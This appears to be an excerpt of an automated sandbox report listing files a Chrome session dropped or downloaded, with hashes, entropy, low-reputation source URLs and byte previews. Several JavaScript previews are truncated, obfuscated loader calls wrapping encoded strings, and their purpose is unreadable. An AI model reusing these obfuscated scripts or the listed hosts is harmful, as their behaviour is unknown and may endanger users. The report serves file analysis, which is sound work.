                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAZgHYBdAGgG8AiQgJULUoC4AzAVzRgBcBLdTT0iACU5AL6kAggFUADABEW7LrzT9BpJCMqskIAARJOAJ25dKAbgDyYAFYguAOgAmIZtzQgACkZQQQRzgBPTBBSSgB9cJAkAFkUJ1YAGxBKCgA3KETWEEYAQhlRIXMMoz0oAF4kTEo5J1xgSiFSFEqHVSgmtErqgDkATQAPS0bSbm6a1gB6ACYRo3LMFEwhTDFSazsuTDQHAFsoCABxEE5Of00cSk4UKENKYiEmpZW1jftObb2DmNZOKB50BdyLpOAAVG6GRjcBzhQiFJrkGAoXYQX4gJyMZ6rcRvLY7fZHE5nIwXbBXCGce6PUhOf5QRQcAGqERGE6sIxoMTiXYnAAW8SQmOW2PWtnenwJPz+TKBIPBt04UJhcOpMFZ/3RDOUfBEokKpBg5XIrLQLiMWqZy3IJT0nHKnF53CQDgAJGqQBqAKLJHloAQge2O53hXSJZgwmAAH0jnHMrM47LQehA1WMUDQSG4TNS5H+xkF5DQUB5jEoSES3BcAFpmFAXJQ9aRsCnKE5uGkc23Wco0tFGNhC8WcmX+Q1SEYoMAekPS2kq0hR6kMlkcg6nQ5rgqHE6AMqjwQDCCspCZ9ClzeGbdIPcoBqiMiGf6mADCiVugvJCqr+3cqUMgWSRhyDAWA4AAcx8dgnGfFBEhQc012dC9OAcMAwJguCjEbZtqjbDsKEfHgYFfd9zxAAZKQ0IJAMRWD4MYRCNwpBxmHQTgMPg8QnGRbxfALdwPCMAAJUEYgAGQYoMYSqRjkI3cjOCEPUhAeB5xEI0waBAU1/AAMQzftiFEYooFKJxxgANSkSZcEaTAjANUhcgARlINhGRUfgRCqag6AYJSwlpP4qznQgZGYEB8DAABWJxUjQJJEiKEBnFcKAkjtJwHHIiB4M4JBlPMIA==")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (8664), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8664
                                                                                                                                                          Entropy (8bit):5.996457686461932
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:HPsKEJM6muuazeEvAzSkQc9y6twbcwDMFMuGmle2:vVz6mWzxAP9j1FBGm82
                                                                                                                                                          MD5:96A302FC4C1E7F244B7A2C13F470B4EC
                                                                                                                                                          SHA1:E55298AF7151326ABC8B3F5D45F60AAA2ADB7FED
                                                                                                                                                          SHA-256:0B2342497080CCAAA613167CF39795C4F88BE9311D7CDFBEEA82486358599C1D
                                                                                                                                                          SHA-512:33634D9C87F6DC6C3A8CFFB3A374607CDDA1868C901B47AEEA931DE0D06EFEB4A552353E65E099519E07DC5F0C92A79BDE799C0341B7F4F05FE79B26FACB98B5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:u9mEPUGiHlEmTCgtFvEn3n8b05PoEtSVaxPKaRSn45NCVta9fXxcb+p+DT8qqjxS+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkbbRYtstBnB71asbtJ+FDIo4GuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KPKur+uOD/6gMaDAzxVzZ6o2pLeZFU1SZ5/KhfAOFea5oNV2XtOYbVE+P57ZZDjxmwk8UQ9nffiOI8VY3sWWFNxUvX2aY+2h4xhGQ8ku2P/o96Y0Im4KTX37ti+8J3H4oj1esEM6drVN683l6SvZBR6TcG5l+Yx80RHXJacIPbUqgA1qCcRE+fGokaXdOgvAHZcwIZlFbrTL/dIMOivwys13yISZlTL8BSNTsx7BcFy67KIiK+Iaq5hP195wunWPa/PH1wYUCxvnMolktfDD3oX5R0Lp8cVkQLBQN5g2pMlSYSkMEyiuV2GxkSL769kLT0WtVIrO/PHfsp3LbaDyrEa5S20tHeCP7HoB+7O5HpQkLakb4oT5Cnv8fiaXGjPRxwNGUNk3ZgETqeQQnRmd1HJaZb1shaX+MB6JvIt2xG3z7V97anjhWRE+9FTPsAoU2uDsT/EmV9hwbtXxBswAotqEwCNjL/JxPDqP//BZW8Qhrs9juxar7YG6CZHyyZi4tl61MJBhFYdpiyCHP3BBQ99SvZY5JBzFmKKWQIqvgDshaIydDDICsoFN8j5DQLnXkxwa8pcFN/s77GQV8DoBfqKC3RYsmvaWTPpZqBGgtqrWsWYzduHh8qiH5AJJw10sZdcK8AtPazS4qyPLE2/KhwX0OgDYR3QsdcgGSqZmBCf3KbMikUUCYA+OXoAE1PDvN/ubP/LpJP+CNVsNPsZUq4y6F9F7m2DLpsWEotcCDew
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 54576
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5666
                                                                                                                                                          Entropy (8bit):7.9502577323919
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:8L5mRVH/KrjXqooRoZxhbv9+/r9o3itgDafNNwcYdkJBpS/McMV8ZCCzQaYl:8OVHO6RGv9+/ry3ugDidlJBw/Mcu8ZCD
                                                                                                                                                          MD5:EE13F724BAE7018EBE07BB5D6AF03AAF
                                                                                                                                                          SHA1:C50182CDF7E632E35EBDE9118B91E19D900B87E8
                                                                                                                                                          SHA-256:E5FBABB419AB24FF6AF5DB9045338DB90C20E058B5AB94C02D2EC725E1C75F51
                                                                                                                                                          SHA-512:334C0488EAA373438EA62D18DD93C6C79DDC0B9AB8FC8C4350D5792F5156AB8ACDA55E9D39728CEC48C1D2714FA8E339D361B449ADA34879F23704C092C043D4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/themes/hongbao.css
                                                                                                                                                          Preview:...........]{...u....aD..Y...O.0..[ 0......pv.q....VkA@..u.*Q.6Q..h.....e+..e4....|.K.{y.w.V%A........9....}..../..a..gg........9.........A8...\o.....F0O.Ep.L..x..z..r....`n......y|4...8..;........p......Z..N... 9...s.(^...x>J...Q.{.j>fI%.....9.5.....$..&.5..g.........E.Y..$=Z....9qz....k..7..p.L...Y..c..q..........G..S..u2A...5(....{..Z...!...mG."..$8$0j....8.g.p...z.....'I|.c..v....s...-.CX..k.v.I8...]........z..l?.....^..a.cM.4.v.$......(.g.pA..h.H...p..su+.D>.i8...1XC}Ll5.;Ia.S..~.[..=...7...<R..>..|m.x....N..N.W^yE..0&..8..4..Q.{.....(.Y{.....Tei.O....*....d!X..R....)g....s....P..Gv..u.$.l...cr..._'..n.N~.zp2.........&...s..5...c..arR8/}!...n.4.`K.:{*...xx}....1...\oc........{|4...).s.OG..O...Q&..d*?.v..\.yt....3.<.L.........|8..h._c...O.2......4.-F.w..........A.....>.p..z.(.m..moo..-G..'.Y.}.9LM.....g...._.C.x..Y...`.o...FU.x...(.~..n..U#.{..)..x..I...)}..m..y..y.<G..M..#I;..5..kP.......$`. ?.t.....W.V.a..q8..w..<}V.a)..w..D..S
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 168x168, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6871
                                                                                                                                                          Entropy (8bit):7.872376472792791
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:p7FikLUR+6X7MCy5nSb1jSG99DX8yclWGo2yscY8:pfA3+gSGjX25+Y8
                                                                                                                                                          MD5:99BE4BFE275809D4E436B77C991B1381
                                                                                                                                                          SHA1:54EADEE77394EB62CCF377AE68D9F49ACB5B6785
                                                                                                                                                          SHA-256:4CA35131972ACDF420B94F0D64A5A0F504EB5A7B0E6FB7B8B467916A12AAE37D
                                                                                                                                                          SHA-512:452A79B02619ED5C1E4F81FC5A4A209CB8A11D03AADB1841AE9BE18FBCA088652CDB54340329C1BF57771ABFB02FFED4BF75B61F4DF96866B7F2358C36AE75A3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......<...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmpMM:InstanceID="xmp.iid:D4BE92C0D83711E8AF8CAD9701B14EA4" xmpMM:DocumentID="xmp.did:D4BE92C1D83711E8AF8CAD9701B14EA4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D4BE92BED83711E8AF8CAD9701B14EA4" stRef:documentID="xmp.did:D4BE92BFD83711E8AF8CAD9701B14EA4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 99 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6784
                                                                                                                                                          Entropy (8bit):7.917484725081505
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:REOE+7fdKoLrjlmFWiqBJhYWIWA6NaqIoXgE2Zr1o1OE9LbyTK:qOEuKcHojqjhYW/A6E02Z5ongK
                                                                                                                                                          MD5:B8B948282A897EFBC4E3585683E960FE
                                                                                                                                                          SHA1:09FD2188DAA5D1FF47FA908669A058364918A450
                                                                                                                                                          SHA-256:3569C2871C5E31C73C40D5F2709051355872F4B8BDD037535485DF1B701AAAFB
                                                                                                                                                          SHA-512:7FC2021E785F2E91A8213E19BD9E2AD408FB75B53C86480D64228CE5F85049FB6F531969E350B81FF6B49B83B1F58E006A787053AC93BA3247DBAB2AFC8EFC3A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/footer/b01.png
                                                                                                                                                          Preview:.PNG........IHDR...c...%.....V:W.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATh.{K.d........*.....h......QB#..v..".........$...+3#.=...UJ.2.,.*.........=......r...s...72.......*.........K.rp......Q...M......o....=|V3z.`..N*.i...OH.b.J......'....kw.....p......zwm<..../..5|....z.....r..;..*....A..Uob.V.a(1T. .3..W;X}g@)...]-.b..x....H`........e.7..K...C~..|..k.......e.m.e=......]@+..@........D.U...L.Ft....5.e.......0..&.&......bx..E.m..f.I.3H..0\|....{...H..q..7E..7#..^..}...rE.;......F..t`.qgM.8.........V.....`C...'..WB.x.$...7^W[...x...;dr?..L...l)z.=F0q.f._iw.;...#N/......1$...{75..6.".-`0....~..`[.q...p....!...J.A.E.6.@.....^{P....y-8.S.C......a8H.1!b....=.(.s....e...K..*......gb....~&..h....J...2.P...7<\\.. ..a...9@......F.. Mmu.Y....9.. ..F}.U.....S.2...Z.....GO......h.l6.....)..@..~.H.U.....>+@.-*....J..D..b.k......o9....p.0"..|^^^........s "03...pok+.3..>.&...n...h..Sh..o.A6.*...K.[R.....$.:.PJ..!L
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3277
                                                                                                                                                          Entropy (8bit):7.68223520405088
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:bccinNuitNFBNeeJ3mQWQ/IW814bOLgAuWahQEGO8YUaDV2E1D3BDhY3g4UZ35MS:4NNW8IR25WKQ5O8YUO22YvS
                                                                                                                                                          MD5:01494C55C9EB698D63A918F634F4F040
                                                                                                                                                          SHA1:FA29AF59187E300D3CB0850B6461C65C777CBD30
                                                                                                                                                          SHA-256:101E350D2DA926DCAFE843885FE34A77946D1E8A20FE1C64DA8692A22AD32B6A
                                                                                                                                                          SHA-512:CF287AB75A71A29BFC9D6E955C3BE308E66B2B31E1B84A24CD01E2F9A39A4B974F1C69E86E7205311FE0B8F4892730B81D923EABCA2A1B687E4F596DC662C3C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_og.png
                                                                                                                                                          Preview:.PNG........IHDR.............L7.4....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:5A43B85B211611E8A37FCD2FD4B0745A" xmpMM:InstanceID="xmp.iid:5A43B85A211611E8A37FCD2FD4B0745A" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8A809D57F77611E7B91CA8896BA0A9B2" stRef:documentID="xmp.did:8A809D58F77611E7B91CA8896BA0A9B2"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18
                                                                                                                                                          Entropy (8bit):3.4193819456463714
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:3W1n:3W1n
                                                                                                                                                          MD5:65A44FC97C89C6A6EF5AC16143DBFCEC
                                                                                                                                                          SHA1:448ECF2AAFC8FB1D52785E0096DDADE283C852AC
                                                                                                                                                          SHA-256:65F6E0D0B6BF1DE78E8640E5B6497340AA3CDD548AE716CA4EE6D1F0F1014096
                                                                                                                                                          SHA-512:571BC83E5CBCC5AC97A635BF8060C36B24B2EB3601928BF0DFA901478256AEC495044FF1E7E4D89F8954923FDB1C34F0D56FDB772EFBF7C9450FFD4CC2731616
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:request-empty-777.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13380
                                                                                                                                                          Entropy (8bit):7.947193700012093
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:OMiNuMZ9aSfgV7ED4zQMjlg3k0ZNNf1iEtlUwizoJDj0wUSgBjDF1/W8Z7Wspv4S:OcO9aSo7E05z0ZNNfQE1BtsjGvspAS
                                                                                                                                                          MD5:5357E4239740BA9EC45D841B12D855FE
                                                                                                                                                          SHA1:7AD3F29D694D88A132DD04A972525E751D286279
                                                                                                                                                          SHA-256:62CDE00BFB7F2FC78CDDCEF1F756F1BF6B41938135FFFC2A983C4EF195A5290A
                                                                                                                                                          SHA-512:21963FFDC270538053958756B2CB00F56B325DF2AE36C23B913CCF4F1E81F8CF9A71E0EE102640DB0227611BE98F48645891B3F6222B28BCB7B9D040718B097B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BC4F1C158D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BC4F1C148D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2316), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2316
                                                                                                                                                          Entropy (8bit):5.85618718760177
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VsttPpUb7eiVtY6XEohvESeJXFKwiKKMYaT5VlnHnV3nn:VwJab7emHshXYAHVX
                                                                                                                                                          MD5:75AA2B864CD1642E1CC069573C0F27E5
                                                                                                                                                          SHA1:C461BC187C235E674E9AC1616C820D3437C11828
                                                                                                                                                          SHA-256:3495B4071EDA392DDD8E67A03A46DEC864EB0D3B5D8D47DAAC50C85121697F5B
                                                                                                                                                          SHA-512:85E9BBF88A9A3C16B8FEFA78307735F855CBED3DA123C8274CE2E388E08BC5E2A6BF8EA539078FA8A9C46DD7BAF2FC9ED9FD18D864CA5C09C968EC567119FAAA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/hCaptcha.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgHYAOAXQBoBvAIgFsArAegFlqAuAMwFc0YAXAJbpMfcmnJQAlDS5IQAAiR8ATgP7UA3AHkw9EPwB0AExAcBaEAAVlKCCGV8AnpnHUA+m5BJmKI1wA2INRUAG5Q/lwgbACEAAwAvpIaYcryKAC8UJjUjIwAYnDUkuQwmQZomCjFApnZACJGxMBF5CBlFQLFSLXUsTAQHC0AFj0AcgCaAB5aLco9dVyMAEwt/umYIJiSmJTx5Dp6/JhDBrRQEADiIHx89kjb2NRDMADC6GYA5sHUMOd8MEMoABJNAcFDfNAoQQcRzUUjFSgCDjKKC0EAAVQASgAZTg8fhCCrSJHZZ7UaLpPhDARIAy/CD/QEgsGnXwgSTKa5cZRoeRoAL+ZJQVJ8dLAcxGFDAAwvOqjNyWACCABUABIGTkQfywTaMAA6jAgMAAJIxyDlaC00GKJVKDKqXorLMqXqrFW4AGoAUUxGk5fG5vPFaEl0qBAGU3NitI7sQAyOMiG0hu2y+VKtVucM+72YjUgLU6zD6w0ms0WorFPgAahyQzc9MZUDcfBQKH8jGo1bQtcYzz+AKgBiGfFo/gA/HMu1SaQZW1wAfFEq0tjs9gd9HxjqdzswuHwoIJ0PcdnI+KrXu8BB82MpysvKJKXv4UHI8bwj0TKDPaWeL29QWvU8hilGJcESJcERgFBaAgfcQCMNhNm2XZ9l0TdtzOS5rluZQT0eZ4AM+b5G0HZlwXNSFoVheEqCRFE0SxXFuA/QktkRDhSRgclKWpWlSKZUEUFZEwOS5Hk+QFIURWTUMZTlBUVXVTVtRgXUDSNU1zUYS1imtYM5IdJ0XTdT0fT9cSg1tMNI2jWMEyTAzUwUjNVSzHMfXzQs1OLDSy203Sq17esBObVt207btgtC4dRwnKdqx/OcUAXIZIPIIxDygd8CWEaQUnkUV+X8QV/UDShOSgIxHDYCxgHkG
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (7648), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7648
                                                                                                                                                          Entropy (8bit):5.937033305798227
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:VSu4qFxjbfaFyVcN5iHKxeNfibCdutZe2BVokOYnCPpLWSNtR:VX4q/r6t5iPfiOA72PR3n
                                                                                                                                                          MD5:57648F1C0BE56658A512181CD40C0958
                                                                                                                                                          SHA1:19178FEDF0FA81538C378E1E4DD944F6618595F5
                                                                                                                                                          SHA-256:2B536CD8BAE2F58B12A4BB816886E866EEFB2B9DFBB0F9399DCF9019184CF22B
                                                                                                                                                          SHA-512:92B79D9E3BBCCC222E3007D75CB845D60E798F08B7B0CACE50A7278CB8AFE4CDB3B6C983A30BFC5ED01E108366E763D8128E6DCF43B6F4489A6CB78D5B284E77
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/noticeBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgBYAaQgZgEYBdYgbwCIKA2XFegLgDMBXNGAFwCW6TP2IhiggJS1+AOhAAPCCgBO/JAF5BmeoQCcnAKr0pmChSkBfYvVwA5MAHkOPPkJFiQMm/QDsAGqKAAquvALCaKLiPrb6fgj6Ye6R0RLSDNxIIAAESPyqggL0ANxOYABWIAJyACYgnIJoIMGqKBAg6gCemBL0APr9IEgAsii13AA2IPR0AG5Qk9wg7ACEAAxWUiULqjlo2rrrMBCcpsRQh/TrgsEAFudagnJRUFLEKFfMrOeqmrS1KD8KBccIeKIyVQgfjcVRoWjAJrNVRIdj0ehWGwwKFAkC1UEpEQyXY5fiafh3QRIcSaRFoWooYByADKAGkAJL2Eo6RgAQQqAHNTLo5AB6egAahAEvooqa9UUcgqSFMcgpICibgiIm8sjkdORWhA+qRnSQWxs3AggP4eIJ2ohskpSDkABJmop+AAVIpwTBa8GYYlQPZkukMplsznc3S1CoVXnC+hiyX8GWiyaCAV3DSZ+qqJUqqRqu4a/1g1L8GRIIO6ADEBs6qsz2f4zLznUwtEEtoAtuwAKwXbj8FAAdUEtQpawoxCQHbGcxWs/nk5AIxDAqa7BIMCQSAAolAkE0BWiQMeZuJj6e0ZnmiHZkgOnayOt1sRoFkVrgQGRh6OawfpMKDtEBxBwCAXStMMqKrLOMDoAUKCTHBs4QFCcwABL8L2kxorMHr8DheEEcQ6j4fBFyAhAQhLlhIBZjmM7EEu6hFIs4FsUIMCLAxTH8OwFBkEOcxenc3C9mAE5TncQnvsQFKSWA7J9kJxAwLCUJoPwwRQAKnTBCgJ7gmivaTrU0yzOg7ZrqoAAyKBQPiAapNWtb0A2pqqKqUK9igS4AMKTMeNb0DAzIALSUrU9RoKYmLWElmIaf82n5vagbBqG5LOjS8iutiF62ge0y9hqYiCOScj9NkkycDVM
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/ocs/cc.png?1717972840810
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15676
                                                                                                                                                          Entropy (8bit):7.95677851421634
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:trkksoIK3AL/H1VPrpeCm4uR72goHW11m71bmrvF:trDI0eH1VFeCm4E7IW14YrvF
                                                                                                                                                          MD5:E9D6F1F9FE9BD1A84D160111A694055B
                                                                                                                                                          SHA1:CAEAA79A384502FB99A1ECDC935F484415C025F7
                                                                                                                                                          SHA-256:2D45AA957F5D5C9D8B607977301737CBEC92E1A5BC21EA5C52001E3DC71796E3
                                                                                                                                                          SHA-512:9E044E7AC8DA66289449E26DF7FE3DA44739B37CBBCE9103061750D1760131F9C2297A9DE6FE22869FE16557A283C2EC86676DC312C06A240D6C4AF371FDE973
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/og_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:6D4B3F368D5911E7A155C2C7373E56B1" xmpMM:InstanceID="xmp.iid:6D4B3F358D5911E7A155C2C7373E56B1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 90 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7088
                                                                                                                                                          Entropy (8bit):7.917580930636184
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:CYzFTu2hWevO50w81o5M986zRHIHsYbhAKF3TFPGIRRiNTKyB7MNnjeFYKdP01cs:zvO2wLy986zaMYbyKlTFeqRgL8nSXk9R
